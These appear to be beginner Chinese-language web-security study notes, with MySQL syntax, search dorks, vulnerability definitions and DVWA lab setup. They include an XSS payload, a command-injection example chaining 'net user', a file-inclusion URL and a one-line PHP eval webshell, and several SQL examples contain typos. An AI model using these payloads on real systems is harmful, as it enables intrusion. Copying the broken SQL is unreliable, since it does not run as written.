警告框: alert()
确认弹窗: confirm()
提示弹窗: prompt()
获取 cookie:
document.cookie
写入cookie:
document.cookie="写入的值"
MySql 语法:
创建数据库:
Creat DATABASE table;
查看数据库:
SHOW databases;
切换数据库: USE table;
删除数据库: DROP DATABASE table;
创建数据表:
CREATE TABLE teacher(
id int(4) not null primary key auto_increment,
name char(20) not nll,
sex char(10) not null,
address char(30) not null
);
给 表里面 插入信息:
INSERT INTO teacher(name,sex,adderss) VALUES(\'EASON\',\'male\',\'beijing\')
更新数据: 更新 teacher 表 里,字段 name 原来的,为 JAY 条件是 ID 等于 1 .
UPDATE teacher SET name:\'JAY\' WHERE ID:1;
删除数据:(删除 teacher 表 里面 的 条件为: name 是 JAY 的 一行数据)
DELETE FROM teacher WHERE name=\'JAY\';
条件查询:(查找 name ,来自 teacher 表里 ,条件是: 地址是 beijing 的,并且 性别是 male 的 )
SELECT name from teacher WHERE address=\'beijing\' AND sex=\'male\';
order by 句子:(排序)
select 你要的信息 from 数据表(或多个) order by 字段 ASC/DESC
UNION 句子(数据表合并)
select 你要的信息 from 数据表1 union select 你要的信息 from 数据表2
select name from teacher union select name from student;
注意: 默认会过滤重复信息, 要显示 重复的信息要 使用: union all
SQL 语句中的注释:
#...
--...
/*...*/
SQL 导入数据:
SOURCE /home/user/Desktop/test_db.sql
SQL内置函数:
database() : 显示当前数据库名称
current_user : 显示当前用户名
load_file(\'文件路径\') : 返回文件内容
version() :数据库版本
into+outfile 写入文件
搜索引擎技巧:
关键字: Hacked by
搜索引擎语法:
intitle:keyword 搜索标题中含有关键词的网页
intext:keyword 正文中含有关键词的网页
site: domain 在某个域名下的网页
WEB安全:
客户端: XSS CSRF 点击劫持 URL跳转
服务器: SQL注入 命令注入 文件类操作
XSS 代码:<img src=a onerror=alert(/xss/)>
CSRF: 跨站请求伪造
ifram 内联框架
点击劫持:通过覆盖不可见的框架误导受害者点击而造成可攻击的行为.
DOS 命令:
ipconfig -all
net user
WEB应用如何命令注入?
1.调用可执行系统命令的函数.
2.函数或者函数的参数可控.
3.拼接注入命令.
FireFox 插件:
Firebug
HackBar
Cookie Manger
Proxy Switcher
网站敏感文件:
网站后台
数据文件
备份文件
Webshell
(猜测文件名,根据返回HTTP状态码 来判断文件是否存在)
200: 成功
404:不存在
302:跳转
一个简单的方法,判断index 的文件类型
查看: index.asp index.php index.aspx index.jsp 等 是否存在.
如何方便检测注入漏洞?
sqlmap 工具
在线 WEB工具:
搜索引擎,帮助搜索信息
fofa.so //网站 信息搜索
whatweb.net //网站信息查询
ipip.net //ip查询
cmd5.com //cmd解密
anquanquan.info //安全工具导航网站
DVWA 安装:
官网下载地址:
HTTP://www.dvwa.co.uk
WINDOWS 下如何连接两条命令?
举例: ping 127.0.0.1 && net user (一个 & 或者 && 或者 | 管道传输)
NET USER 用于创建和修改计算机上的用户帐户。当不带选项使用本命令时,它会列出计算机上的用户帐户。用户帐户的信息存储在用户帐户数据库中。 该命令仅在服务器上运行。
CSRF 漏洞:
重新构造 HTML 提交参数 .
文件包含:
../ 返回上级 或者 ..\
http://127.0.0.1/qwe/vulnerabilities/fi/?page=file://C:\phpStudy\PHPTutorial\WWW\qwe\phpinfo.php (本地文件,协议)
文件上传:
一句话 WEBSHELL: <? @eval($_GET[\'cmd\']);?>